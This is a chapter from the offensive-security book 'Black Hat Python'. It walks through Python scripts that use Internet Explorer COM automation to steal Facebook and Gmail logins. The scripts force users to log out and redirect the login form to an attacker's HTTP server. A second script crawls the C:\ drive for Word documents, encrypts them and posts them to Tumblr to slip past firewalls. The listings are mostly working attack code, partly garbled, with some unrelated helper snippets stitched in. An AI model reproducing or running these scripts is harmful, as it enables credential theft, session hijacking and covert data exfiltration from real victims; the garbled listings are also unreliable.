Black Hat Python: Python Programming for Hackers and Pentesters (2014)

Chapter 9. Fun with Internet Explorer

Windows COM automation serves a number of practical uses, from interacting with network-based services to embedding a Microsoft Excel spreadsheet into your own application. All versions of Windows from XP forward allow you to embed an Internet Explorer COM object into applications, and we’ll take advantage of this ability in this chapter. Using the native IE automation object, we’ll create a man-in-the-browser-style attack where we can steal credentials from a website while a user is interacting with it. We’ll make this credential-stealing attack extendable, so that several target websites can be harvested. The last step will use Internet Explorer as a means to exfiltrate data from a target system. We’ll include some public key crypto to protect the exfiltrated data so that only we can decrypt it.

Internet Explorer, you say? Even though other browsers like Google Chrome and Mozilla Firefox are more popular these days, most corporate environments still use Internet Explorer as their default browser. And of course, you can’t remove Internet Explorer from a Windows system — so this technique should always be available to your Windows trojan.

Man-in-the-Browser (Kind Of)

Man-in-the-browser (MitB) attacks have been around since the turn of the new millennium. They are a variation on the classic man-in-the-middle attack. Instead of acting in the middle of a communication, malware installs itself and steals credentials or sensitive information from the unsuspecting target’s browser. Most of these malware strains (typically called Browser Helper Objects) insert themselves into the browser or otherwise inject code so that they can manipulate the browser process itself. As browser developers become wise to these techniques and antivirus vendors increasingly look for this behavior, we have to get a bit sneakier. By leveraging the native COM interface to Internet Explorer, we can control any IE session in order to get credentials for social networking sites or email logins. You can of course extend this logic to change a user’s password or perform transactions with their logged-in session. Depending on your target, you can also use this technique in conjunction with your keylogger module in order to force them to re-authenticate to a site while you capture the keystrokes.

We’ll begin by creating a simple example that will watch for a user browsing Facebook or Gmail, de-authenticate them, and then modify the login form to send their username and password to an HTTP server that we control. Our HTTP server will then simply redirect them back to the real login page.

If you’ve ever done any JavaScript development, you’ll notice that the COM model for interacting with IE is very similar. We are picking on Facebook and Gmail because corporate users have a nasty habit of both reusing passwords and using these services for business (particularly, forwarding work mail to Gmail, using Facebook chat with coworkers, and so on). Let’s crack open a new file and enter the following code:

  import win32com.client

  import time

  import urlparse

  import urllib

➊ data_receiver = "http://localhost:8080/"

➋ target_sites  = {}

      target_sites[""] =

          {"logout_url"      : None,

           "logout_form"     : "logout_form",

           "login_form_index": 0,

           "owned"           : False}

      target_sites[""]    =

          {"logout_url"       : "



           "logout_form"      : None,

           "login_form_index" : 0,

           "owned"            : False}

      # use the same target for multiple Gmail domains

      target_sites[""] = target_sites[""]

      target_sites[""] = target_sites[""]


    ➌ windows = win32com.client.Dispatch(clsid)

These are the makings of our man-(kind-of)-in-the-browser attack. We define our data_receiver ➊ variable as the web server that will receive the credentials from our target sites. This method is riskier in that a wily user might see the redirect happen, so as a future homework project you could think of ways of pulling cookies or pushing the stored credentials through the DOM via an image tag or other means that look less suspicious. We then set up a dictionary of target sites ➋ that our attack will support. The dictionary members are as follows: logout_url is a URL we can redirect via a GET request to force a user to log out; the logout_form is a DOM element that we can submit that forces the logout; login_form_index is the relative location in the target domain’s DOM that contains the login form we’ll modify; and the owned flag tells us if we have already captured credentials from a target site because we don’t want to keep forcing them to log in repeatedly or else the target might suspect something is up. We then use Internet Explorer’s class ID and instantiate the COM object ➌, which gives us access to all tabs and instances of Internet Explorer that are currently running.
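The comment about using the same target for multiple domains relies on ordinary Python aliasing: assigning one dictionary entry to another key stores a reference to the same object, not a copy. The short sketch below illustrates only that behavior. It is written for Python 3, and the hostnames and the site_config name are hypothetical placeholders, since the real keys are elided in the listing above.

```python
# Hypothetical hostnames and values, for illustration only.
site_config = {"login_form_index": 0, "owned": False}

sites = {"mail.example.com": site_config}

# A second key that points at the very same dictionary object.
sites["www.mail.example.com"] = sites["mail.example.com"]

# Flipping the flag through one key...
sites["www.mail.example.com"]["owned"] = True

# ...is visible through the other, because both keys share one object.
shared = sites["mail.example.com"] is sites["www.mail.example.com"]
flag_seen_via_alias = sites["mail.example.com"]["owned"]

print(shared, flag_seen_via_alias)
```

The practical consequence is that a per-site flag set under one hostname automatically applies to every alias of that site. If independent state per hostname were wanted instead, each key would need its own copy (for example via dict(site_config)).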

Now that we have the support structure in place, let’s create the main loop of our attack:

  while True:

➊     for browser in windows:

          url = urlparse.urlparse(browser.LocationUrl)

➋         if url.hostname in target_sites:

➌             if target_sites[url.hostname]["owned"]:


              # if there is a URL, we can just redirect

➍             if target_sites[url.hostname]["logout_url"]:




                  # retrieve all elements in the document

➎                 full_doc = browser.Document.all

                  # iterate, looking for the logout form

                  for i in full_doc:


                      # find the logout form and submit it

➏                     if == target_sites[url.hostname]["logout_form"]:





          # now we modify the login form


              login_index = target_sites[url.hostname]["login_form_index"]

              login_page = urllib.quote(browser.LocationUrl)

➐             browser.Document.forms[login_index].action = "%s%s" % (data_.

              receiver, login_page)

              target_sites[url.hostname]["owned"] = True




This is our primary loop where we monitor our target’s browser session for the sites from which we want to nab credentials. We start by iterating through all currently running Internet Explorer ➊ objects; this includes active tabs in modern IE. If we discover that the target is visiting one of our predefined sites ➋ we can begin the main logic of our attack. The first step is to determine whether we have executed an attack against this site already ➌; if so, we won’t execute it again. (This has a downside in that if the user didn’t enter their password correctly, you can miss their credentials; I’ll leave our simplified solution as a homework assignment to improve upon.)

We then test to see if the target site has a simple logout URL that we can redirect to ➍ and if so, we force the browser to do so. If the target site (such as Facebook) requires the user to submit a form to force the logout, we begin iterating over the DOM ➎ and when we discover the HTML element ID that is registered to the logout form ➏, we force the form to be submitted. After the user has been redirected to the login form, we modify the endpoint of the form to post the username and password to a server that we control ➐, and then wait for the user to perform a login. Notice that we tack the URL-encoded address of the current page onto the end of the URL of our HTTP server that collects the credentials. This is so our HTTP server knows what site to redirect the browser to after collecting the credentials.
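The mechanics of carrying one URL inside the path of another come down to percent-encoding and decoding. The sketch below shows just that round trip, along with the hostname lookup used by the dictionary test. It is written for Python 3, where the urlparse and urllib functions used in the listing live in urllib.parse. The page URL is a hypothetical example.

```python
from urllib.parse import quote, unquote, urlparse

receiver = "http://localhost:8080/"                  # value from the listing
page = "https://www.example.com/login?next=/home"    # hypothetical page URL

# The hostname is what gets looked up in the dictionary of sites.
hostname = urlparse(page).hostname

# Percent-encode the page URL so that '?', '=' and ':' survive as path text.
combined = receiver + quote(page)

# On the receiving side, drop the leading '/' from the path and decode it.
path = urlparse(combined).path
recovered = unquote(path[1:])

print(hostname)
print(combined)
print(recovered == page)
```

Note that quote leaves '/' unescaped by default, which is why the embedded URL still reads as a sequence of path segments.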

You’ll notice the function wait_for_browser referenced in a few spots above, which is a simple function that waits for a browser to complete an operation such as navigating to a new page or waiting for a page to load fully. Let’s add this functionality now by inserting the following code above the main loop of our script:

def wait_for_browser(browser):

    # wait for the browser to finish loading a page

    while browser.ReadyState != 4 and browser.ReadyState != "complete":



Pretty simple. We are just looking for the DOM to be fully loaded before allowing the rest of our script to keep executing. This allows us to carefully time any DOM modifications or parsing operations.
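One thing a bare polling loop lacks is a way out if the page never finishes loading. As a hedged variation, the sketch below wraps the same idea in a generic helper with a timeout. It is written for Python 3. The wait_until helper and the FakeBrowser stand-in are hypothetical names introduced here so the example runs without Internet Explorer, and the value 4 is the "complete" ready state already used in the loop above.

```python
import time


def wait_until(predicate, timeout=10.0, interval=0.1):
    """Poll predicate() until it is true or timeout seconds have elapsed.

    Returns True if the predicate became true, False on timeout.
    """
    deadline = time.monotonic() + timeout
    while not predicate():
        if time.monotonic() >= deadline:
            return False
        time.sleep(interval)
    return True


class FakeBrowser:
    """Stand-in object that reports ready state 4 on the third poll."""

    def __init__(self):
        self.polls = 0

    @property
    def ReadyState(self):
        self.polls += 1
        return 4 if self.polls >= 3 else 1


browser = FakeBrowser()
loaded = wait_until(lambda: browser.ReadyState == 4, timeout=2.0, interval=0.01)
timed_out = wait_until(lambda: False, timeout=0.05, interval=0.01)

print(loaded, browser.polls, timed_out)
```

Returning a boolean rather than raising leaves it to the caller to decide whether a page that never loads is worth a retry or should simply be skipped.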

Creating the Server

Now that we’ve set up our attack script, let’s create a very simple HTTP server to collect the credentials as they’re submitted. Crack open a new file and drop in the following code:

  import SimpleHTTPServer

  import SocketServer

  import urllib

  class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):

      def do_POST(self):

➊         content_length = int(self.headers['Content-Length'])

➋         creds ='utf-8')

➌         print creds

➍         site = self.path[1:]


➎         self.send_header('Location',urllib.unquote(site))


➏ server = SocketServer.TCPServer(('', 8080), CredRequestHandler)


This simple snippet of code is our specially designed HTTP server. We initialize the base TCPServer class with the IP, port, and CredRequestHandler class ➏ that will be responsible for handling the HTTP POST requests. When our server receives a request from the target’s browser, we read the Content-Length header ➊ to determine the size of the request, and then we read in the contents of the request ➋ and print them out ➌. We then parse out the originating site (Facebook, Gmail, etc.) ➍ and force the target browser to redirect ➎ back to the main page of the target site. An additional feature you could add here is to send yourself an email every time credentials are received so that you can attempt to log in using the target’s credentials before they have a chance to change their password. Let’s take it for a spin.

Kicking the Tires

Fire up a new IE instance and run your attack script and your server script in separate windows. You can test browsing around to various websites first to make sure that you aren’t seeing any odd behavior, which you shouldn’t. Now browse to Facebook or Gmail and attempt to log in. In the server’s window, you should see something like the following, using Facebook as an example:

C:\> python.exe



localhost - - [12/Mar/2014 00:03:50] "POST / HTTP/1.1" 301 -

You can clearly see the credentials arriving, and the redirect by the server kicking the browser back to the main login screen. Of course, you can also perform a test where you have Internet Explorer running and you’re already logged in to Facebook; then try running your script and you can see how it forces the logout. Now that we can nab the user’s credentials in this manner, let’s see how we can spawn IE to help exfiltrate information from a target network.

IE COM Automation for Exfiltration

Gaining access to a target network is only a part of the battle. To make use of your access, you want to be able to exfiltrate documents, spreadsheets, or other bits of data off the target system. Depending on the defense mechanisms in place, this last part of your attack can prove to be tricky. There might be local or remote systems (or a combination of both) that work to validate processes opening remote connections, as well as whether those processes should be able to send information or initiate connections outside of the internal network. A fellow Canadian security researcher, Karim Nathoo, pointed out that IE COM automation has the wonderful benefit of using the Iexplore.exe process, which is typically trusted and whitelisted, to exfiltrate information out of a network.

We’ll create a Python script that will first hunt for Microsoft Word documents on the local filesystem. When a document is encountered, the script will encrypt it using public key cryptography.[20] After the document is encrypted, we’ll automate the process of posting the encrypted document to a blog on Tumblr. This will enable us to dead-drop the document and retrieve it when we want to without anyone else being able to decrypt it. By using a trusted site like Tumblr, we should also be able to bypass any blacklisting that a firewall or proxy may have, which might otherwise prevent us from just sending the document to an IP address or web server that we control. Let’s start by putting some supporting functions into our exfiltration script. Open up a new file and enter the following code:

import win32com.client

import os

import fnmatch

import time

import random

import zlib

from Crypto.PublicKey import RSA

from Crypto.Cipher import PKCS1_OAEP

doc_type   = ".doc"

username   = ""

password   = "justinBHP2014"

public_key = ""

def wait_for_browser(browser):

    # wait for the browser to finish loading a page

    while browser.ReadyState != 4 and browser.ReadyState != "complete":



We are only creating our imports, the document types that we will search for, our Tumblr username and password, and a placeholder for our public key, which we’ll generate later on. Now let’s add our encryption routines so that we can encrypt the filename and file contents.

  def encrypt_string(plaintext):

      chunk_size = 256

      print "Compressing: %d bytes" % len(plaintext)

➊     plaintext = zlib.compress(plaintext)

      print "Encrypting %d bytes" % len(plaintext)

➋     rsakey = RSA.importKey(public_key)

      rsakey =

      encrypted = " "

      offset    = 0

➌     while offset < len(plaintext):

          chunk = plaintext[offset:offset+chunk_size]

➍         if len(chunk) % chunk_size != 0:

              chunk += " " * (chunk_size - len(chunk))

          encrypted += rsakey.encrypt(chunk)

          offset    += chunk_size

➎     encrypted = encrypted.encode("base64")

      print "Base64 encoded crypto: %d" % len(encrypted)

      return encrypted

 def encrypt_post(filename):

     # open and read the file

     fd = open(filename,"rb")

     contents =


➏    encrypted_title = encrypt_string(filename)

     encrypted_body  = encrypt_string(contents)

     return encrypted_title,encrypted_body

Our encrypt_post function is responsible for taking in the filename and returning both the encrypted filename and the encrypted file contents in base64-encoded format. We first call the main workhorse function encrypt_string ➏, passing in the filename of our target file which will become the title of our blog post on Tumblr. The first step of our encrypt_string function is to apply zlib compression on the file ➊ before setting up our RSA public key encryption object ➋ using our generated public key. We then begin looping through the file contents ➌ and encrypting them in 256-byte chunks. Be aware that 256 bytes is the size of the modulus of a 2048-bit RSA key, and therefore of each ciphertext block, not the maximum plaintext size: OAEP padding needs room inside that block, so with the default SHA-1 hash the most plaintext that fits in one block is 214 bytes, and the chunk size used for encryption has to stay at or below that limit. When we encounter the last chunk of the file ➍, if it is shorter than the chunk size, we pad it with spaces to ensure that we can successfully encrypt it and decrypt it on the other side. After we build our entire ciphertext string, we base64-encode it ➎ before returning it. We use base64 encoding so that we can post it to our Tumblr blog without problems or weird encoding issues.
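The bookkeeping around the encryption loop (compress, split into chunks, base64-encode) can be checked without any crypto library. The sketch below is written for Python 3 and uses only the standard library. The RSA step is deliberately omitted, and the oaep_max_plaintext and split_chunks helpers are hypothetical names introduced for illustration. The size formula is the RSAES-OAEP message limit from RFC 8017, k - 2*hLen - 2, where k is the modulus size in bytes and hLen the hash output size.

```python
import base64
import zlib


def oaep_max_plaintext(key_bits, hash_len=20):
    """Largest message, in bytes, that fits in one RSA-OAEP block.

    hash_len defaults to 20, the SHA-1 digest size.
    """
    return key_bits // 8 - 2 * hash_len - 2


def split_chunks(data, size):
    """Split data into consecutive pieces of at most size bytes."""
    return [data[i:i + size] for i in range(0, len(data), size)]


original = b"hello world " * 100

limit = oaep_max_plaintext(2048)        # per-block plaintext limit
payload = zlib.compress(original)       # compress before chunking
chunks = split_chunks(payload, limit)   # each piece would be encrypted

# Stand-in for the ciphertext: here the chunks are simply rejoined.
encoded = base64.b64encode(b"".join(chunks))
restored = zlib.decompress(base64.b64decode(encoded))

print(limit, len(chunks), restored == original)
```

Because each encrypted block comes out at the full modulus size (256 bytes for a 2048-bit key) regardless of how much plaintext went in, the decrypting side can still step through the ciphertext in fixed 256-byte strides.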

Now that we have our encryption routines set up, let’s begin adding in the logic to deal with logging in and navigating the Tumblr dashboard. Unfortunately, there is no quick and easy way of finding UI elements on the Web: I simply spent 30 minutes using Google Chrome and its developer tools to inspect each HTML element that I needed to interact with.

It is also worth noting that through Tumblr’s settings page, I turned the editing mode to plaintext, which disables their pesky JavaScript-based editor. If you wish to use a different service, then you too will have to figure out the precise timing, DOM interactions, and HTML elements that are required — luckily, Python makes the automation piece very easy. Let’s add some more code!

➊ def random_sleep():



  def login_to_tumblr(ie):

      # retrieve all elements in the document

➋     full_doc = ie.Document.all

      # iterate looking for the login form

      for i in full_doc:

➌         if == "signup_email":


          elif == "signup_password":



      # you can be presented with different home pages

➍     if ie.Document.forms[0].id == "signup_form":




      except IndexError, e:



      # the login form is the second form on the page



We create a simple function called random_sleep ➊ that will sleep for a random period of time; this is designed to allow the browser to execute tasks that might not register events with the DOM to signal that they are complete. It also makes the browser appear to be a bit more human. Our login_to_tumblr function begins by retrieving all elements in the DOM ➋, and looks for the email and password fields ➌ and sets them to the credentials we provide (don’t forget to sign up an account). Tumblr can present a slightly different login screen with each visit, so the next bit of code ➍ simply tries to find the login form and submit it accordingly. After this code executes, we should now be logged into the Tumblr dashboard and ready to post some information. Let’s add that code now.

  def post_to_tumblr(ie,title,post):

      full_doc = ie.Document.all

      for i in full_doc:

          if == "post_one":


              title_box = i


          elif == "post_two":


              print "Set text area"


          elif == "create_post":

              print "Found post button"

              post_form = i


      # move focus away from the main content box


➊     title_box.focus()


      # post the form





None of this code should look very new at this point. We are simply hunting through the DOM to find where to post the title and body of the blog posting. The post_to_tumblr function only receives an instance of the browser and the encrypted filename and file contents to post. One little trick (learned by observing in Chrome developer tools) ➊ is that we have to shift focus away from the main content part of the post so that Tumblr’s JavaScript enables the Post button. These subtle little tricks are important to jot down as you apply this technique to other sites. Now that we can log in and post to Tumblr, let’s put the finishing touches in place for our script.

  def exfiltrate(document_path):

➊     ie = win32com.client.Dispatch("InternetExplorer.Application")

➋     ie.Visible = 1

      # head to tumblr and login



      print "Logging in..."


      print "Logged in...navigating"



      # encrypt the file

      title,body = encrypt_post(document_path)

      print "Creating new post..."


      print "Posted!"

      # destroy the IE instance

➌     ie.Quit()

      ie = None


  # main loop for document discovery

  # NOTE: no tab for first line of code below

➍ for parent, directories, filenames in os.walk("C:\\"):

      for filename in fnmatch.filter(filenames,"*%s" % doc_type):

          document_path = os.path.join(parent,filename)

          print "Found: %s" % document_path



Our exfiltrate function is what we will call for every document that we want to store on Tumblr. It first creates a new instance of the Internet Explorer COM object ➊, and the neat thing is that you can set the process to be visible or not ➋. For debugging, leave it set to 1, but for maximum stealth you definitely want to set it to 0. This is really useful if, for example, your trojan detects other activity going on; in that case, you can start exfiltrating documents, which might help to further blend your activities in with that of the user. After we call all of our helper functions, we simply kill our IE instance ➌ and return. The last bit of our script ➍ is responsible for crawling through the C:\ drive on the target system and attempting to match our preset file extension (.doc in this case). Each time a file is found, we simply pass the full path of the file off to our exfiltrate function.
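The directory crawl combines os.walk with fnmatch, and two details of that pairing are easy to miss: fnmatch.filter follows the platform's case rules (case-insensitive on Windows, case-sensitive elsewhere), and a pattern such as *.doc does not match .docx. The sketch below is written for Python 3 and demonstrates both against a throwaway temporary directory. The find_files helper and the sample file names are hypothetical.

```python
import fnmatch
import os
import tempfile


def find_files(root, pattern):
    """Yield paths under root whose lowercased file name matches pattern."""
    for parent, _dirs, filenames in os.walk(root):
        for name in filenames:
            # Lowercase the name so the match behaves the same on any OS.
            if fnmatch.fnmatchcase(name.lower(), pattern):
                yield os.path.join(parent, name)


with tempfile.TemporaryDirectory() as root:
    os.mkdir(os.path.join(root, "sub"))
    samples = ("a.doc", "B.DOC", "c.txt", "e.docx", os.path.join("sub", "d.doc"))
    for rel in samples:
        with open(os.path.join(root, rel), "w") as handle:
            handle.write("sample")

    found = sorted(os.path.basename(p) for p in find_files(root, "*.doc"))

print(found)
```

Writing the walk as a generator means matches are produced as the tree is traversed, rather than only after the whole drive has been scanned.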

Now that we have our main code ready to go, we need to create a quick and dirty RSA key generation script, as well as a decryption script that we can use to paste in a chunk of encrypted Tumblr text and retrieve the plaintext. Let’s start by opening a new file and entering the following code:

from Crypto.PublicKey import RSA

new_key = RSA.generate(2048, e=65537)

public_key = new_key.publickey().exportKey("PEM")

private_key = new_key.exportKey("PEM")

print public_key

print private_key

That’s right: Python is so bad-ass that we can do it in a handful of lines of code. This block of code outputs both a private and public key pair. Copy the public key into the public_key variable of your exfiltration script. Then open a new Python file and enter the following code (paste the private key into the private_key variable):

  import zlib

  import base64

  from Crypto.PublicKey import RSA

  from Crypto.Cipher import PKCS1_OAEP

  private_key = "###PASTE PRIVATE KEY HERE###"

➊ rsakey = RSA.importKey(private_key)

  rsakey =

  chunk_size= 256

  offset = 0

  decrypted = ""

➋ encrypted = base64.b64decode(encrypted)

  while offset < len(encrypted):

➌     decrypted += rsakey.decrypt(encrypted[offset:offset+chunk_size])

      offset += chunk_size

  # now we decompress to original

➍ plaintext = zlib.decompress(decrypted)

  print plaintext

Perfect! We simply instantiate our RSA class with the private key ➊ and then shortly thereafter we base64-decode ➋ our encoded blob from Tumblr. Much like our encoding loop, we simply grab 256-byte chunks ➌ and decrypt them, slowly building up our original plaintext string. The final step ➍ is to decompress the payload, because we previously compressed it on the other side.

Kicking the Tires

There are a lot of moving parts to this piece of code, but it is quite easy to use. Simply run your script from a Windows host and wait for it to indicate that it has successfully posted to Tumblr. If you left Internet Explorer visible, you should have been able to watch the whole process. After it’s complete, you should be able to browse to your Tumblr page and see something like Figure 9-1.

Figure 9-1. Our encrypted filename

As you can see, there is a big encrypted blob, which is the name of our file. If you scroll down, you will clearly see that the title ends where the font is no longer bold. If you copy and paste the title into your decryption script and run it, you should see something like this:

#:> python

C:\Program Files\Debugging Tools for Windows (x86)\dml.doc


Perfect! My script picked up a document from the Windows Debugging Tools directory, uploaded the contents to Tumblr, and I can successfully decrypt the file name. Now of course to do the entire contents of the file, you would want to automate it using the tricks I showed you in Chapter 5 (using urllib2 and HTMLParser), which I will leave as a homework assignment for you. The other thing to consider is that in our script, we pad the last chunk out to 256 bytes with the space character, and this might break certain file formats. Another idea for extending the project is to encrypt a length field at the beginning of the blog post contents that tells you the original size of the document before you padded it. You can then read in this length after decrypting the blog post contents and trim the file to that exact size.
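The length-field idea can be sketched independently of the encryption. The example below is written for Python 3 and is only one possible layout, not the author's: it assumes a 4-byte big-endian length header, and the pad_with_length and strip_padding names are hypothetical. The sample data deliberately ends in spaces to show that they survive the round trip.

```python
import struct

HEADER = ">I"                              # 4-byte big-endian unsigned length
HEADER_SIZE = struct.calcsize(HEADER)


def pad_with_length(data, block_size):
    """Prefix data with its length, then space-pad to a block multiple."""
    framed = struct.pack(HEADER, len(data)) + data
    remainder = len(framed) % block_size
    if remainder:
        framed += b" " * (block_size - remainder)
    return framed


def strip_padding(framed):
    """Read the length header and return exactly that many bytes."""
    (length,) = struct.unpack(HEADER, framed[:HEADER_SIZE])
    return framed[HEADER_SIZE:HEADER_SIZE + length]


document = b"report ends with spaces   "   # trailing spaces must be kept
padded = pad_with_length(document, 256)
trimmed = strip_padding(padded)

print(len(document), len(padded), trimmed == document)
```

Stripping trailing spaces with rstrip would have eaten the three spaces that belong to the document; reading the explicit length avoids having to guess where the content ends.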

[20] The Python package PyCrypto can be installed from